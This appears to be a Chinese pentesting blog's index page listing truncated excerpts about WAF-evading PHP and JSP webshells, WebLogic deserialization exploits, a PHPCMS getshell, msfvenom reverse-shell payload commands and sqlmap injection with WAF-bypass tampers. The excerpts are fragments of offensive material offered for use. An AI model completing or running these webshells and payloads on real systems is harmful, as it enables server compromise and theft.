渗透测试

2018最新过全WAF/CDN/D盾/安全狗小马Or大马

首先感谢土司大佬:Math_random 上代码---注意菜刀链接密码为:ximcx <?php $x="BaSe64"; $b="_deCOde"; $c=$x.$b; eva...继续阅读 »
渗透测试

记录WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址

首先,郭姓某牛丢来了一个有weblogic漏洞的地址http://x.x.x.x:7001 说用k8的weblogic2628去getshell不能链接shell,我也试了下,好像确实不能链接...... 接着...继续阅读 »
渗透测试

WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC

脚本来自指尖安全B牛。原文地址:https://www.secfree.com/article-957.html #!env python # -*- coding: utf-8 -*- import so...继续阅读 »
渗透测试

JDK低版本Jsp大马---Jspspy

JDK低版本可用,感谢原作者,备份下 下载地址:http://ximcx.cn/content/uploadfile/201807/jspspy.txt <%@page pageEnc...继续阅读 »
渗透测试

[笔记]通杀PHPCMSv9 getshell

小结下: 菜刀马不能用get方式。开始一直失败~~~上传上去了,显示却是自己服务器的shell~~弄了好久终于好了~~ 菜刀马: <?php @eval($_POST[...继续阅读 »
渗透测试

爱奇艺游戏风云榜,电视剧,电影CSRF之你点击就收藏(官方SRC已忽略)

保存笔记而已~~~~~~ 本文涉及业务URL如下 1.http://top.iqiyi.com/youxi.html 2.http://www.iqiyi.com/u/fav 本文涉及漏洞URL...继续阅读 »
渗透测试

msfvenom生成各种Payload命令

msfvenom -l 列出所有模块,攻击载荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<...继续阅读 »
渗透测试

SQLmap笔记---持续更新

sqlmap -u http://www.baidu.com/news_show.aspx?id=97 检测注入点是否可用 sqlmap -u http://www.baidu.com/news...继续阅读 »
渗透测试

SQLmap注入之tamper绕过WAF防火墙过滤

每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多...继续阅读 »
sitemap